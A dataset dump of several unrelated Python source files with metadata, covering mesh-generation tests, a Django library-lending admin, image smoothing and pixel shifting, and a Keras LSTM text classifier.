os.environ[\"context.teamId\"]\nworkspace_id = os.environ[\"context.workspaceId\"]\ndevice = os.environ['context.deviceId']\n\n\nremote_weights_path = os.environ['modal.state.slyFile']\nremote_embeddings_dir = os.environ['modal.state.slyEmbeddingsDir']\n\nlocal_dataset_path = os.path.join(my_app.data_dir, 'sly_dataset')\nlocal_weights_path = None\n\ndownload_batch_size = os.environ['modal.state.downloadBatchSize']\ncalc_batch_size = os.environ['modal.state.batchSize']\nonly_current_workspace = int(os.environ['modal.state.OnlyCurrentWorkspace']) # 0 or 1\n\n\nroot_source_dir = str(Path(sys.argv[0]).parents[2])\nsys.path.append(os.path.join(root_source_dir, 'src'))\n\n\n# DEBUG\nsly.fs.clean_dir(my_app.data_dir, ignore_errors=True)\n", "sub_path": "supervisely/calculator/sly_globals.py", "file_name": "sly_globals.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "supervisely_lib.logger", "line_number": 12, "usage_type": "attribute"}, {"api_name": "supervisely_lib.AppService", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "supervisely_lib.fs.clean_dir", "line_number": 42, "usage_type": "call"}, {"api_name": "supervisely_lib.fs", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "335208751", "text": "# -*- coding: utf-8 -*-\nimport pygmsh\n\nfrom helpers import compute_volume\n\n\ndef test():\n geom = pygmsh.opencascade.Geometry(\n characteristic_length_min=1.0, characteristic_length_max=1.0\n )\n\n lcar = 1\n h = 25\n w = 10\n length = 100\n # x_fin = -0.5 * length\n cr = 1\n\n f = 0.5 * w\n y = [-f, -f + cr, +f - cr, +f]\n z = [0.0, h - cr, h]\n f = 0.5 * cr\n x = [-f, f]\n points = []\n points.append(geom.add_point((x[0], y[0], z[0]), lcar=lcar))\n points.append(geom.add_point((x[0], y[0], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[1], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[1], z[2]), lcar=lcar))\n points.append(geom.add_point((x[0], y[2], z[2]), lcar=lcar))\n points.append(geom.add_point((x[0], y[2], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[3], z[1]), lcar=lcar))\n points.append(geom.add_point((x[0], y[3], z[0]), lcar=lcar))\n\n lines = []\n lines.append(geom.add_line(points[0], points[1]))\n lines.append(geom.add_circle_arc(points[1], points[2], points[3]))\n\n lines.append(geom.add_line(points[3], points[4]))\n lines.append(geom.add_circle_arc(points[4], points[5], points[6]))\n lines.append(geom.add_line(points[6], points[7]))\n lines.append(geom.add_line(points[7], points[0]))\n\n line_loop = geom.add_line_loop(lines)\n surface = geom.add_plane_surface(line_loop)\n geom.extrude(surface, translation_axis=[length, 0, 0])\n\n points, cells, _, _, _ = pygmsh.generate_mesh(geom)\n\n ref = 24941.503891355664\n assert abs(compute_volume(points, cells) - ref) < 1.0e-2 * ref\n return points, cells\n\n\nif __name__ == \"__main__\":\n import meshio\n\n meshio.write_points_cells(\"opencascade_extrude2.vtu\", *test())\n", "sub_path": "test/test_opencascade_extrude2.py", "file_name": "test_opencascade_extrude2.py", "file_ext": "py", "file_size_in_byte": 1760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pygmsh.opencascade.Geometry", "line_number": 8, "usage_type": "call"}, {"api_name": "pygmsh.opencascade", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygmsh.generate_mesh", "line_number": 47, "usage_type": "call"}, {"api_name": "helpers.compute_volume", "line_number": 50, "usage_type": "call"}, {"api_name": "meshio.write_points_cells", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "29612986", "text": "from logging import getLogger\n\n\nfrom django.contrib import admin, messages\nfrom django.utils import timezone\n\nfrom opac.admin.messages import AdminMessage, LendingAdminMessage\nfrom opac.models.transactions import Lending\nfrom opac.services import LendingBackService, LendingRenewService, ServiceError\nfrom opac.services.errors import (\n FirstReservationHoldingAlreadyExistsError,\n RenewingAlreadyExistsError,\n ReservationExistsError\n)\n\nlogger = getLogger(__name__)\n\n\nclass LendingAdmin(admin.ModelAdmin):\n list_display = (\n 'get_lending_number',\n 'get_stock_number',\n 'get_book_name',\n 'user',\n 'get_lent_at',\n 'due_date',\n 'get_renewed_due_date',\n 'get_is_not_overdue',\n 'get_is_stock_reserved',\n 'get_is_renewed',\n 'is_renewable'\n )\n search_fields = ('id', 'stock__id', 'stock__book__name', 'user__username')\n raw_id_fields = ('stock', 'user')\n actions = ('renew', 'back')\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def get_queryset(self, request):\n return (\n Lending.objects\n .prefetch_related('renewing')\n .prefetch_related('stock__reservations')\n )\n\n def get_lending_number(self, lending):\n return lending.id\n get_lending_number.admin_order_field = 'id'\n get_lending_number.short_description = '貸出番号'\n\n def get_stock_number(self, lending):\n return lending.stock.id\n get_stock_number.admin_order_field = 'stock__id'\n get_stock_number.short_description = '蔵書番号'\n\n def get_book_name(self, lending):\n return lending.stock.book.name\n get_book_name.admin_order_field = 'stock__book__name'\n get_book_name.short_description = '書名'\n\n def get_lent_at(self, lending):\n return timezone.localtime(lending.created_at).date()\n get_lent_at.admin_order_field = 'created_at'\n get_lent_at.short_description = '貸出日'\n\n def get_renewed_due_date(self, lending):\n return lending.renewing.due_date\n get_renewed_due_date.admin_order_field = 'renewing__due_date'\n get_renewed_due_date.short_description = '延長期限'\n\n def get_is_not_overdue(self, lending):\n return not lending.is_overdue()\n get_is_not_overdue.boolean = True\n get_is_not_overdue.short_description = '返却期限内?'\n\n def get_is_stock_reserved(self, lending):\n return 'Yes' if lending.stock.is_reserved() else 'No'\n get_is_stock_reserved.short_description = '予約有り?'\n\n def get_is_renewed(self, lending):\n return 'Yes' if lending.is_renewed() else 'No'\n get_is_renewed.short_description = '延長済み?'\n\n def renew(self, request, lendings):\n try:\n for lending in lendings:\n LendingRenewService(lending).exec()\n except RenewingAlreadyExistsError as e:\n logger.warning('貸出の延長に失敗しました', e)\n self.message_user(\n request,\n LendingAdminMessage.RENEWING_ALREADY_EXISTS,\n level=messages.WARNING\n )\n except ReservationExistsError as e:\n logger.warning('貸出の延長に失敗しました', e)\n self.message_user(\n request,\n LendingAdminMessage.RESERVATION_EXISTS,\n level=messages.WARNING\n )\n except ServiceError as e:\n logger.exception('貸出の延長に失敗しました', e)\n self.message_user(\n request, AdminMessage.ERROR_OCCURRED, level=messages.ERROR)\n else:\n self.message_user(request, LendingAdminMessage.RENEWED)\n renew.short_description = '選択された 貸出 を延長する'\n\n def back(self, request, lendings):\n try:\n for lending in lendings:\n LendingBackService(lending).exec()\n except FirstReservationHoldingAlreadyExistsError as e:\n logger.exception('貸出の返却に失敗しました', e)\n self.message_user(\n request,\n LendingAdminMessage.FIRST_RESERVATION_HOLDING_ALREADY_EXISTS,\n level=messages.WARNING)\n except ServiceError as e:\n logger.exception('貸出の返却に失敗しました', e)\n self.message_user(\n request, AdminMessage.ERROR_OCCURRED, level=messages.ERROR)\n else:\n self.message_user(request, LendingAdminMessage.BACKED)\n back.short_description = '選択された 貸出 を返却する'\n\n\nadmin.site.register(Lending, LendingAdmin)\n", "sub_path": "opac/admin/models/transactions/lending.py", "file_name": "lending.py", "file_ext": "py", "file_size_in_byte": 4652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}, {"api_name": "opac.models.transactions.Lending.objects.prefetch_related", "line_number": 42, "usage_type": "call"}, {"api_name": "opac.models.transactions.Lending.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "opac.models.transactions.Lending", "line_number": 42, "usage_type": "name"}, {"api_name": "django.utils.timezone.localtime", "line_number": 63, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 63, "usage_type": "name"}, {"api_name": "opac.services.LendingRenewService", "line_number": 88, "usage_type": "call"}, {"api_name": "opac.services.errors.RenewingAlreadyExistsError", "line_number": 89, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.RENEWING_ALREADY_EXISTS", "line_number": 93, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 93, "usage_type": "name"}, {"api_name": "django.contrib.messages.WARNING", "line_number": 94, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 94, "usage_type": "name"}, {"api_name": "opac.services.errors.ReservationExistsError", "line_number": 96, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.RESERVATION_EXISTS", "line_number": 100, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 100, "usage_type": "name"}, {"api_name": "django.contrib.messages.WARNING", "line_number": 101, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 101, "usage_type": "name"}, {"api_name": "opac.services.ServiceError", "line_number": 103, "usage_type": "name"}, {"api_name": "opac.admin.messages.AdminMessage.ERROR_OCCURRED", "line_number": 106, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.AdminMessage", "line_number": 106, "usage_type": "name"}, {"api_name": "django.contrib.messages.ERROR", "line_number": 106, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 106, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.RENEWED", "line_number": 108, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 108, "usage_type": "name"}, {"api_name": "opac.services.LendingBackService", "line_number": 114, "usage_type": "call"}, {"api_name": "opac.services.errors.FirstReservationHoldingAlreadyExistsError", "line_number": 115, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.FIRST_RESERVATION_HOLDING_ALREADY_EXISTS", "line_number": 119, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 119, "usage_type": "name"}, {"api_name": "django.contrib.messages.WARNING", "line_number": 120, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 120, "usage_type": "name"}, {"api_name": "opac.services.ServiceError", "line_number": 121, "usage_type": "name"}, {"api_name": "opac.admin.messages.AdminMessage.ERROR_OCCURRED", "line_number": 124, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.AdminMessage", "line_number": 124, "usage_type": "name"}, {"api_name": "django.contrib.messages.ERROR", "line_number": 124, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 124, "usage_type": "name"}, {"api_name": "opac.admin.messages.LendingAdminMessage.BACKED", "line_number": 126, "usage_type": "attribute"}, {"api_name": "opac.admin.messages.LendingAdminMessage", "line_number": 126, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 130, "usage_type": "call"}, {"api_name": "opac.models.transactions.Lending", "line_number": 130, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 130, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "65121467", "text": "import numpy\nfrom matplotlib import pyplot as plt\nimport smooth_map\n\nshrink_map=True\nif shrink_map:\n #meerkat image is rather big, so shrink it down\n meerkat=plt.imread('meerkat.jpg')\n meerkat=meerkat[::2,::2,:]\n meerkat=meerkat[0:2120,0:1400,:]\nelse:\n meerkat=plt.imread('meerkat_small.jpg')\n\nsmoothed_map=numpy.zeros(meerkat.shape)\nunsmoothed_map=numpy.zeros(meerkat.shape)\nnpix_smooth=3.5\nnpix_restore=4\nfor i in range(3):\n tmp=numpy.squeeze(meerkat[:,:,i])\n tmp_smooth=smooth_map.smooth_map(tmp,npix_smooth)\n smoothed_map[:,:,i]=tmp_smooth\n tmp2=smooth_map.smooth_map(tmp_smooth,npix_restore,False)\n unsmoothed_map[:,:,i]=tmp2\n\nif shrink_map:\n plt.imsave('meerkat_small.jpg',meerkat)\nplt.imsave('meerkat_smoothed_' + repr(npix_smooth) + '.jpg',smoothed_map/smoothed_map.max())\nplt.imsave('meerkat_unsmoothed_' + repr(npix_restore) + '.jpg',unsmoothed_map/unsmoothed_map.max())\n\n\n\n\n\n\n#plt.clf()\n#plt.imshow(smoothed_map/smoothed_map.max())\n#plt.savefig('meerkat_smoothed_' + repr(npix_smooth) + '.jpg')\n\n#plt.clf()\n#plt.imshow(unsmoothed_map/unsmoothed_map.max())\n#plt.savefig('meerkat_unsmoothed_' + repr(npix_restore) + '.jpg')\n\n", "sub_path": "fourier_transforms/image_convolution_example_org.py", "file_name": "image_convolution_example_org.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imread", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 19, "usage_type": "call"}, {"api_name": "smooth_map.smooth_map", "line_number": 20, "usage_type": "call"}, {"api_name": "smooth_map.smooth_map", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imsave", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "474036615", "text": "from PIL import Image\nimport numpy as np\nfrom image_utilities import ranges\n\n\ndef parse_args():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--files\", \"-f\", dest=\"files\", default=[\"../demo/nasa--hI5dX2ObAs-unsplash.jpg\"], nargs=\"+\",\n help=\"File(s) to sort. Can be any format supported by PIL. \")\n parser.add_argument(\"--checkerboard\", nargs=1, default=200,\n help=\"Size of checkerboard pattern.\")\n parser.add_argument(\"--crop_to_fit\", action=\"store_true\",\n help=\"Crops the image to fit the checkerboard pattern.\")\n return parser.parse_args()\n\n\ndef shift_row_wrapped(row: np.ndarray, shift_by: int):\n \"\"\" Shift pixels in row to the right. Pixels shifted off the end of the row become the first elements of the row.\n In place.\n\n :param row: The list to modify - pixels will be circularly shifted in place.\n :param shift_by: The amount to shift the elements by to the right (-ve if to the left).\n :return: Nothing: operations are done in place.\n \"\"\"\n\n row_len = row.shape[0]\n shift_by %= row_len\n shift_by = row_len - shift_by\n\n if shift_by == 0:\n return\n\n holding = np.copy(row)\n\n right_part = holding[shift_by:]\n left_part = holding[:shift_by]\n row[:row_len - shift_by] = right_part\n row[row_len - shift_by:] = left_part\n\n\ndef shift_rows_and_cols(image, rows_to_shift, cols_to_shift, shift_rows_by, shift_columns_by):\n \"\"\" Shifts all specified rows and columns (in rows_to_shift and cols_to_shift) by the specified amount. This wraps.\n\n SIDE EFFECTS: Will modify the input image - provide a copy to sort on if this is unwanted.\n\n :param shift_columns_by: How many pixels to shift the specified columns by.\n :param shift_rows_by: How many pixels to shift the specified rows by.\n :param cols_to_shift: The specific columns in the image which should be shifted.\n :param rows_to_shift: The specific rows in the image which should be shifted.\n :param image: The image to modify.\n :return: Nothing. Image is modified in place - user is expected to provide a copy.\n \"\"\"\n\n for row in rows_to_shift:\n shift_row_wrapped(image[row, :], shift_rows_by)\n\n for col in cols_to_shift:\n shift_row_wrapped(image[:, col], shift_columns_by)\n\n\ndef main():\n \"\"\" Program runner: parses the arguments and produces the appropriate images.\"\"\"\n import os\n\n args = parse_args()\n\n for file_name in args.files:\n img = Image.open(file_name)\n pixels = np.copy(np.asarray(img))\n rows, cols, _ = pixels.shape\n\n if args.crop_to_fit:\n rows -= rows % args.checkerboard\n cols -= cols % args.checkerboard\n pixels = pixels[0:rows, 0:cols]\n\n shift_rows_and_cols(pixels, ranges(args.checkerboard, rows), ranges(args.checkerboard, cols),\n 2*args.checkerboard, args.checkerboard)\n\n im = Image.fromarray(pixels)\n im.save(f\"{os.path.splitext(file_name)[0]}_shifted{os.path.splitext(file_name)[-1]}\")\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "ImageMutation/shift_pixels.py", "file_name": "shift_pixels.py", "file_ext": "py", "file_size_in_byte": 3217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.copy", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 70, "usage_type": "call"}, {"api_name": "image_utilities.ranges", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}]} +{"seq_id": "76037922", "text": "from __future__ import print_function\nimport numpy as np\nimport random\nimport sys\nnp.random.seed(1337) # for reproducibility\nfrom keras.datasets import reuters\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.embeddings import Embedding\nfrom keras.callbacks import Callback\nfrom keras.layers.recurrent import LSTM, SimpleRNN, GRU\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Convolution1D, MaxPooling1D\nfrom keras.utils import np_utils\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing import sequence\nfrom pathlib import PurePath\nimport pickle\nimport os\nimport time\nimport json\n\nclass MyHistory(Callback):\t\n\t\n\tdef set_config(self, config):\n\t\tself._config = config\n\t\tself._filename = config.get_filename()\n\n\tdef on_train_begin(self, logs={}):\t\n\t\tprint('results will be stored here:',self._filename)\n\t\tf = open(self._filename,'w')\n\t\tf.write(json.dumps(self._config.__dict__))\n\t\tf.close()\n\n\tdef on_epoch_end(self, epoch, logs={}):\n\t\tf = open(self._filename,'a')\n\t\tf.write(\"\\n{0} : acc = {1} , loss = {2}\".format(epoch,logs['acc'],logs['loss']))\n\t\tf.close()\n\t\t\n\ndef get_vocabulary(file):\n\tclasses = []\n\tf = open(file, 'r')\n\tword_freq = {}\n\tfor line in f:\n\t\tels = line.split('\\t')\n\t\tclasses.append(els[0])\n\t\tfor word in els[1].strip().split(' '):\n\t\t\tif word not in word_freq:\n\t\t\t\tword_freq[word] = 0\n\t\t\tword_freq[word] += 1\n\tword_freq = sorted(word_freq.items(), key=lambda x: (-x[1], x[0]))\n\treturn word_freq,sorted(set(classes))\n\n\ndef load_data_for_generation(file,voc,classes): \n word_index = []\n count=0\n for x in voc:\n word_index.append(x[0])\n count += 1\n \n train_file = open(file,'r')\n X = []\n labels = [] \n # encode the words based on the word_index\n train_file = open(file,'r')\n for line in train_file:\n els = line.split('\\t')\n labels.append(classes.index(els[0]))\n words = []\n for word in els[1].strip().split(' '):\n if word in word_index:\n words.append(word_index.index(word))\n X.append(words) \n return X,labels\n\ndef load_dataset(file,nb_words, test_split=0.2):\n\tif os.path.exists(file):\n\t\tpp = PurePath(file)\n\t\tvoc_file_name = os.path.splitext(file)[0] + '-voc.pkl'\n\t\ttrain_file_name = os.path.splitext(file)[0] + '-rd.pkl'\n\t\tif pp.suffix is not '.pkl':\n\t\t\tif not os.path.exists(train_file_name) or not os.path.exists(voc_file_name):\n\t\t\t\tprint('first time loading dataset, generating pickle files')\n\t\t\t\tvoc, classes = get_vocabulary(file)\t\t\t\n\t\t\t\tpickle.dump((voc,classes),open(voc_file_name,'wb'))\n\t\t\t\tX,labels = load_data_for_generation(file,voc,classes)\n\t\t\t\tpickle.dump((X,labels),open(train_file_name,'wb'))\t\n\t\tX,labels = pickle.load(open(train_file_name,'rb'))\n\t\tX = [[1] + [w + 3 for w in x] for x in X]\n\t\tif nb_words is not None and nb_words > 0:\n\t\t\tX = [[2 if (w >= nb_words or w < 0) else w for w in x] for x in X]\n\t\tX_train = np.array(X[:int(len(X) * (1 - test_split))])\n\t\ty_train = np.array(labels[:int(len(X) * (1 - test_split))])\n\n\t\tX_test = np.array(X[int(len(X) * (1 - test_split)):])\n\t\ty_test = np.array(labels[int(len(X) * (1 - test_split)):])\n\t\treturn X_train,y_train,X_test,y_test\n\telse:\n\t\traise Exception('dataset file does not exist')\n\t\t\ndef load_voc(file):\n\tif os.path.exists(file):\n\t\tpp = PurePath(file)\n\t\tvoc_file_name = os.path.splitext(file)[0] + '-voc.pkl'\n\t\tif pp.suffix is '.pkl':\n\t\t\tvoc_file_name = file\n\t\treturn pickle.load(open(voc_file_name,'rb'))\n\traise Exception('vocabulary file not found')\n\ndef test_cnn_lstm(config):\t\n\tmax_features = config.embedding_size\t\n\tprint('Loading data...')\n\t\n\tX_train,y_train,X_test,y_test = load_dataset(config.dataset_file,max_features,config.dataset_test_split)\n\tnb_classes = np.max(y_train) + 1\n\t\n\tprint('Vectorizing sequence data...')\n\tX_train = sequence.pad_sequences(X_train)\n\tX_test = sequence.pad_sequences(X_test)\n\tY_train = np_utils.to_categorical(y_train, nb_classes)\n\tY_test = np_utils.to_categorical(y_test, nb_classes)\n\tprint('Build model...')\n\n\tmodel = Sequential()\n\tmodel.add(Embedding(max_features, 128))\n\tif len(config.lstm_layers) == 0:\t\n\t\tmodel.add(LSTM(128))\n\telif len(config.lstm_layers) == 1:\n\t\tmodel.add(LSTM(config.lstm_layers[0]))\n\telse:\n\t\tfor lstm_layer in config.lstm_layers[:-1]:\n\t\t\tmodel.add(LSTM(lstm_layer, return_sequences=True))\n\t\tmodel.add(LSTM(config.lstm_layers[len(config.lstm_layers)-1]))\n\tmodel.add(Dense(nb_classes))\n\tmodel.add(Activation('softmax'))\n\n\tmodel.compile(loss='categorical_crossentropy',\n\t\t\t\toptimizer='adam',\n\t\t\t\tmetrics=['accuracy'])\n\n\tbatch_size = config.batch_size\n\tprint(\"Train...\")\t\n\thistory = MyHistory()\t\n\thistory.set_config(config)\n\tmodel.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=config.nb_epoch, validation_data=(X_test, Y_test),verbose=1, callbacks=[history])\n\t\t\t\n\tscore = model.evaluate(X_test, Y_test, batch_size=batch_size)\n\tprint('Test score:', score)\t\n\tf_write_score = open(config.get_filename(),'a')\n\tf_write_score.write('\\n{0}'.format(str(model.metrics_names)))\n\tf_write_score.write('\\n{0}'.format(str(score)))\n\tf_write_score.close()\n\treturn score, model\n\n\nclass Config:\n\n\tdef __init__(self):\n\t\tself._embedding_size = 40000\n\t\tself._batch_size = 32\n\t\tself._conv_filter_length = 3\n\t\tself._conv_nb_filter = 64\n\t\tself._pool_length = 2\n\t\tself._nb_epoch = 15\n\t\tself._dataset_file = '../datasets/reuters/r52-all-all-terms.txt'\n\t\tself._dataset_test_split = 0.2\n\t\tself._lstm_layers = []\n\t\tself._output_folder = '.results'\n\n\t@property\n\tdef embedding_size(self):\n\t\treturn self._embedding_size\n\t\n\t@embedding_size.setter\t\n\tdef embedding_size(self, size):\n\t\tself._embedding_size = size\n\t\n\t@property\n\tdef batch_size(self):\n\t\treturn self._batch_size\n\t\n\t@batch_size.setter\t\n\tdef batch_size(self, size):\n\t\tself._batch_size = size\n\t\t\n\t@property\n\tdef dataset_file(self):\n\t\treturn self._dataset_file\t\n\t\n\t@dataset_file.setter\t\n\tdef dataset_file(self, file):\n\t\tself._dataset_file = file\n\t\t\n\t@property\n\tdef dataset_test_split(self):\n\t\treturn self._dataset_test_split\t\n\t\n\t@dataset_test_split.setter\t\n\tdef dataset_test_split(self, test_split):\n\t\tself._dataset_test_split = test_split\n\t\t\n\t@property\n\tdef nb_epoch(self):\n\t\treturn self._nb_epoch\t\n\t\n\t@nb_epoch.setter\t\n\tdef nb_epoch(self, nb_epoch):\n\t\tself._nb_epoch = nb_epoch\n\t\t\n\t@property\n\tdef lstm_layers(self):\n\t\treturn self._lstm_layers\t\n\t\n\t@lstm_layers.setter\t\n\tdef lstm_layers(self, layers):\n\t\tself._lstm_layers = layers\n\t\t\n\t@property\n\tdef output_folder(self):\n\t\treturn self._output_folder\t\n\t\n\t@output_folder.setter\t\n\tdef output_folder(self, output_folder):\n\t\tself._output_folder = output_folder\n\t\t\n\tdef get_filename(self):\n\t\tif self.output_folder is not None and self.output_folder != '' and os.path.exists(self.output_folder):\n\t\t\treturn os.path.join(self.output_folder,str(self)+'.txt')\n\t\treturn str(self) + '.txt'\n\t\t\n\tdef __str__(self):\n\t\treturn 'lstm_config=' + str(self.embedding_size) + '_' + str(self.batch_size) + '_' + str(self.nb_epoch)\n\t\ndef batch_randomizer():\n\tnb_epochs = [5,15,30,45,60,75,100]\n\tbatch_sizes = [8,16,32,64,128]\n\tembedding_sizes = [1000,5000,10000,100000]\n\tlstm_layers = [[],[256,128],[256,128,64]]\n\toutput_folder = '.lstm_results'\n\tcombinaisons = []\n\tfor epoch in nb_epochs:\n\t\tfor batch in batch_sizes:\n\t\t\tfor embedding_size in embedding_sizes:\t\t\t\n\t\t\t\tfor lstm_layer in lstm_layers:\n\t\t\t\t\tcombinaisons.append([epoch,batch,embedding_size,lstm_layer])\n\t\n\tshuff_comb = list(combinaisons)\n\trandom.shuffle(shuff_comb)\n\tmax_score = [0.0,0.0]\n\tfor combinaison in shuff_comb:\n\t\tconfig = Config()\n\t\tconfig.output_folder = output_folder\n\t\tconfig.nb_epoch = combinaison[0]\n\t\tconfig.batch_size = combinaison[1]\n\t\tconfig.embedding_size = combinaison[2]\n\t\tconfig.lstm_layers = combinaison[3]\n\t\tfull_path = config.get_filename()\n\t\tif os.path.exists(full_path) :\n\t\t\tprint('This sample has already been test, look into ',full_path,' file')\n\t\telse:\n\t\t\tprint('testing -> epochs=',config.nb_epoch,'batch_size=',config.batch_size,'embedding_size=',config.embedding_size,'lstm_layers=',config.lstm_layers)\n\t\t\tscore,new_model = test_cnn_lstm(config)\t\n\t\t\tif score[1]>max_score[1]:\n\t\t\t\tmax_score = score\n\t\t\t\tprint('New high score : ',max_score)\n\t\t\t\tf_max = open(config.get_filename()+'-best.txt','a')\n\t\t\t\tf_max.write(json.dumps(config.__dict__))\n\t\t\t\tf_max.write('\\n'+str(max_score)+'\\n'+'*'*10+'\\n')\t\n\ndef predict_sentence(model,line,voc,classes,config):\n\tX = []\n\twords = []\n\tword_index = []\n\tcount=0\n\tfor x in voc:\n\t\tword_index.append(x[0])\n\t\tcount += 1\n\t\t\n\tfor word in line.split(' '):\n\t\tif word in word_index:\n\t\t\twords.append(word_index.index(word)+3)\n\t\telse:\n\t\t\twords.append(2)\n\twords.append(1)\n\tX.append(words) \n\tX = sequence.pad_sequences(X)\t\n\tprint(classes)\t\n\tprint(model.predict_proba(X,batch_size=config.batch_size))\n\ndef try_this():\n\tconfig = Config()\n\tconfig.dataset_file = '../datasets/little/agent.txt'\n\tconfig.batch_size = 6\n\tconfig.embedding_size = 1000\n\tconfig.nb_epoch = 20\n\t#config.lstm_layers = [256,128,64,32]\n\tmodel = test_cnn_lstm(config)\n\tvoc,classes = get_vocabulary(config.dataset_file)\n\txtr,ytr,xte,yte=load_dataset(config.dataset_file,config.embedding_size,config._dataset_test_split)\n\t\n\ttxte = []\n\tfor a in xte:\n\t\ts = []\n\t\tfor w in a:\n\t\t\tif w-3>0:\n\t\t\t\ts.append(voc[w-3][0])\n\t\ttxte.append(' '.join(s))\n\t\n\tfor s in txte:\n\t\tprint(s)\n\t\tpredict_sentence(model,s,voc,classes,config)\n\t\n\tline = input('sentence to predict : ')\n\twhile line is not 'exit':\t\t\n\t\tpredict_sentence(model,line,voc,classes,config)\n\t\tline = input('sentence to predict : ')\n\nif __name__ == '__main__':\n\tbatch_randomizer()", "sub_path": "scripts/reuters tests/reuters_lstm_batch.py", "file_name": 